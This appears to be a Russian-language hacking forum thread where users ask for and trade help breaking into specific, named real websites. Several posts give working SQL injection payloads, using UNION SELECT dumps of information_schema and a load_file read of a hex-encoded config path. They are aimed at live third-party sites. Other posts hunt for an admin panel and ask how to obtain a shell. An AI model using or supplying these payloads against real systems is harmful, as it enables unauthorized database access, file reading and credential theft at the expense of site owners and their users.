Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Decoy

    Decoy New Member

    Joined:
    4 Dec 2005
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
  2. MAQUEEN

    MAQUEEN RadioActivity

    Joined:
    27 Sep 2008
    Messages:
    422
    Likes Received:
    126
    Reputations:
    32
    спаасибо за ответ.
     
  3. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    помогите найти админку...http://www.nll.com/
     
  4. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вот: http://www.nll.com/admin.inc. Но там 403.

    З.Ы. Видел уже не один твой подобный пост. Скачай себе сканер директорий сайта и им же ищи админку.
     
  5. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Попробуй выбрать из этого:

     
  6. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Decoy

    хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
    +GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E)+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+

    Далее из полученных таблиц выводи имена колонок:
    site.com/fail.php?id=-1+union+select
    +GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+from+information_schema.columns+where+table_name=захексенное.имя.таблицы--+

    получаешь имена колонок, и:
    site.com/fail.php?id=-1+union+select
    +concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)

    ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
     
  7. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Добрый день!
    С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.
    Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?

    http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D61782F72656D61786D756C74697573752F7070686C6F676765722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113--
     
    1 person likes this.
  8. $r00tkit$

    $r00tkit$ New Member

    Joined:
    23 Jun 2010
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.
     
  9. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?

    ". '('.mysql_errno().') '.mysql_error().'
    '. "Please check your settings in config.inc.php !
    "); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Нажми Ctrl+U на клавиатуре и посмотри.
    Press Ctrl+U on your keyboard and see
     
  11. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_

    http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27

     
  12. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Благодарю вас, это работа
     
  13. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    0_о не понял в чем проблема?
    http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+select+1,2,3,4,5,concat_ws%280x3a,table_schema,table_name,column_name%29+from+information_schema.columns--+
     
  14. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Привет.
    Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет).
    На сайтике есть один скриптик. Его вызов таков:
    http://site/lol.php?p=name
    этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом).
    Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php).
    Еще кое что есть.
    Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей.

    Что можно сделать, дорогие эксперты?
    Спасибо.
     
    _________________________
  15. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    По той информации, что ты предоставил, судить о наличии уязвимостей не возможно.
    Либо задавай вопрос конкретнее, либо читай статьи.
     
    1 person likes this.
  16. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
    http://www.noracom24.eu/image.php?w=200&h=120&id='
     
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29+--+
    
    там в картинке выводится
     
  18. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Seravin
    Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,

    от этого одни минусы

    1. вы не осваиваете sql инъекцию хорошо
    2. вы доверяете программу которая может ошибиться
    3. и этот взлом даже не можете считать вашим (это чистое мнение)

    однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
    потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул

    sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)

    вообщем дело ваше, простите за оффтоп(если это оффтоп)
     
    _________________________
    1 person likes this.
  20. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    https://forum.antichat.ru/showpost.php?p=2243635&postcount=14262
    Актуально.
    Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.
     
Thread Status:
Not open for further replies.